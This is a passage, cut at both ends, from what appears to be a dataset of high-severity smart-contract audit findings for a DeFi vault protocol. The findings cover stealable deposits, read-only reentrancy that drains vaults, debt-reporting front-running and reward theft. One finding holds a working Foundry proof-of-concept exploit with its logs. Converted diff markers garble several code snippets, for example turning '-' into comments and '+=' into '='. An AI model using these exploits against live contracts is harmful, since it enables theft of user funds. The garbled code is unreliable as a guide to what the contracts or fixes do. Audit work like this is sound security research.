getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? 
DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n","The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.","```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. 
the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n" +ETH deposited by the user may be stolen.,high,"In the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and these WETH belong to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user deposits 10 ETH and approves 10 WETH to the contract, when the deposit amount is 10, all of the user's 20 WETH will be transferred into the contract.\\nHowever, due to the `amount` being 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by the attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address 
recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.",Perform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`,ETH deposited by the user may be stolen.,"```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n" +Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPull,high,"In the `_withdraw` function, Destination Vault rewards will be first recorded in `info.IdleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled` > info.totalAssetsToPull, `info.idleIncrease` is directly assigned as `info.totalAssetsPulled` - info.totalAssetsToPull, and `info.totalAssetsPulled` is `assetPulled` without considering Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease 
+= _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.",`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`,"The final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.","```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop 
processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n" +Liquidations miss delegate call to swapper,high,"The LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. 
IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pull them either (swap function here). Because of this the function reverts.\\nI noticed that there is no transfer back to LiquidationRow from Swapper either. Tokens can't get in or out.\\nWhen I searched the codebase, I found that Swapper is being called in another place using the delegatecall method. This way it can operate with the tokens of the caller. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So I think that instead of missing transfer, the problem is actually in the way how swapper is called.","Change the async swapper call from the normal function call to the low-level delegatecall function the same way it is done in LMPVaultRouter.sol:swapAndDepositToVault.\\nI would like to address that AsyncSwapperMock in LiquidationRow.t.sol is a poorly written mock and should be updated to represent how the AsyncSwapper works. It would be nice to update the test suite for LiquidationRow because its current state won't catch this. If you check the LiquidationRow.t.sol tests, the mock swap function only mints tokens, no need to use delegatecall. This is why tests missed this vulnerability.",Rewards collected through LiquidationRow claimsVaultRewards get stuck in the contract. 
Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.,"```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n" +"When `queueNewRewards` is called, caller could transfer tokens more than it should be",high,"Inside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, 
address(this), newRewards);\\n }\\n```\\n\\nHowever, when this function tried to pull funds from sender via `safeTransferFrom`, it used `newRewards` amount, which already added by `startingQueuedRewards`. If previously `queuedRewards` already have value, the processed amount will be wrong.","Update the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\n","There are two possible issue here :\\nIf previously `queuedRewards` is not 0, and the caller don't have enough funds or approval, the call will revert due to this logic error.\\nIf previously `queuedRewards` is not 0, and the caller have enough funds and approval, the caller funds will be pulled more than it should (reward param + `queuedRewards` )","```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = 
queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n" +Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokens,high,"`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. 
The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, it would take `msg.value` instead of transfer WETH from user. And it would make a raw call instead of transfer WETH to user.\\nIf raw call is sent to user, then they could reenter LMP vault and attack the protocol and it would be successful cause CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves\\nDeposit shares at fair price\\nRemove liquidity on Curve and updateDebtReporting in LMPVault with view only reentrancy\\nWithdraw shares at unfair price","If CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. 
As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\n","The protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many asset for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk cause a large portion of their deposit would be on Curve V2 pools with WETH token.",```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n +"updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profit",high,"updateDebtReporting takes in a user input of destinations in array whose debt to report, so if a destination vault is incurring loss and is not on the front of withdrawalQueue than a attacker can just update debt for only the destination which are incurring a profit and withdraw in the same txn. 
He will exit the vault with profit, others who withdraw after the legit updateDebtReporting txn will suffer even more loss than they should have, as some part of the profit which was used to offset the loss was taken by the attacker and protocol fees\\nPOC-\\nLMPVault has 2000 in deposits 1000 from alice and 1000 from bob\\nVault has invested that in 1000 in DestinationVault1 & 1000 in DestinationVault2 (no idle for simple calculations)\\nNow Dv1 gain a profit of 5%(+50 base asset) while Dv2 is in 10% loss(-100 base asset)\\nSo vault has net loss of 50. Now alice does a updateDebtReporting([Dv1]) and not including Dv2 in the input array.\\nNow she withdraws her money, protocol now falsely believes there is a profit, it also take 20% profit fees(assumed) and mints 10 shares for itself and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legit updateDebtReporting txn comes and bob has to account in for the loss\\nTest for POC - Add it to LMPVaultMintingTests contract in LMPVault-Withdraw.t.sol file under path test/vault. 
run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n\\n// for simplicity sake, i'll be assuming vault keeps nothing idle\\n\\n// as it does not affect the attack vector in any ways\\n\\n_accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n\\n_accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\naddress feeSink = vm.addr(555);\\n\\n_lmpVault.setFeeSink(feeSink);\\n\\n_lmpVault.setPerformanceFeeBps(2000); // 20%\\n\\naddress alice = address(789);\\n\\nuint initialBalanceAlice = 1000;\\n\\n// User is going to deposit 1000 asset\\n\\n_asset.mint(address(this), 1000);\\n\\n_asset.approve(address(_lmpVault), 1000);\\n\\nuint shareBalUser = _lmpVault.deposit(1000, address(this));\\n\\n_underlyerOne.mint(address(this),500);\\n\\n_underlyerOne.approve(address(_lmpVault),500);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultOne),\\n\\naddress(_underlyerOne),\\n\\n500,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n_asset.mint(alice,initialBalanceAlice);\\n\\nvm.startPrank(alice);\\n\\n_asset.approve(address(_lmpVault),initialBalanceAlice);\\n\\nuint shareBalAlice = _lmpVault.deposit(initialBalanceAlice,alice);\\n\\nvm.stopPrank();\\n\\n// rebalance to 2nd vault\\n\\n_underlyerTwo.mint(address(this), 1000);\\n\\n_underlyerTwo.approve(address(_lmpVault),1000);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultTwo),\\n\\naddress(_underlyerTwo),\\n\\n1000,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n// the second destVault incurs loss, 10%\\n\\n_mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n\\n \\n\\n// the first vault incurs some profit, 5%\\n\\n// so lmpVault is in netLoss of 50 baseAsset\\n\\n_mockRootPrice(address(_underlyerOne), 2.1 ether);\\n\\n// malicious updateDebtReporting by alice\\n\\naddress[] memory alteredDestinations = new address[](1);\\n\\nalteredDestinations[0] 
= address(_destVaultOne);\\n\\nvm.prank(alice);\\n\\n_lmpVault.updateDebtReporting(alteredDestinations);\\n\\n \\n\\n// alice withdraws first\\n\\nvm.prank(alice);\\n\\n_lmpVault.redeem(shareBalAlice , alice,alice);\\n\\nuint finalBalanceAlice = _asset.balanceOf(alice);\\n\\nemit log_named_uint(""final Balance of alice "", finalBalanceAlice);\\n\\n// protocol also collects its fees\\n\\n// further wrecking the remaining LPs\\n\\nemit log_named_uint(""Fees shares give to feeSink "", _lmpVault.balanceOf(feeSink));\\n\\nassertGt( finalBalanceAlice, initialBalanceAlice);\\n\\nassertGt(_lmpVault.balanceOf(feeSink), 0);\\n\\n// now updateDebtReporting again but for all DVs\\n\\n_lmpVault.updateDebtReporting(_destinations);\\n\\n \\n\\nemit log_named_uint(""Remaining LPs can only get "",_lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(""Protocol falsely earned(in base asset)"", _lmpVault.maxWithdraw(feeSink));\\n\\nemit log_named_uint(""Vault totalAssets"" , _lmpVault.totalAssets());\\n\\nemit log_named_uint(""Effective loss take by LPs"", 1000 - _lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(""Profit for Alice"",_asset.balanceOf(alice) - initialBalanceAlice);\\n\\n}\\n```\\n\\nLogs: final Balance of alice : 1019 Fees shares give to feeSink : 10 Remaining LPs can only get : 920 Protocol falsely earned(in base asset): 9 Vault totalAssets: 930 Effective loss take by LPs: 80 Profit for Alice: 19","updateDebtReporting should not have any input param, should by default update for all added destination vaults",Theft of user funds. 
Submitting as high as the attacker only needs to front-run an updateDebtReporting txn with malicious input and withdraw his funds.,```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n +Inflated price due to unnecessary precision scaling,high,"The `price` at Line 137 below is denominated in 18 decimals as the `getPriceInEth` function always returns the `price` in 18 decimals precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (existing._initAcc) to be inflated significantly.\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, the `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function returns 3 ETH (3e18). 
Thus, the following code will be executed at Line 144s and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by the scale of 1e18, which results in the prices being extremely skewed.\\nUsing the formula of fast filter, the final fast filter price computed will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed only to be worth around 3 ETH. 
However, the fast filter price wrongly determine that it is worth around 1340000000000000000 ETH\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\n","Remove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\n","The price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. 
When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.",```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n +Immediately start getting rewards belonging to others after staking,high,"Note This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. 
However, this turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\n","Ensure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder 
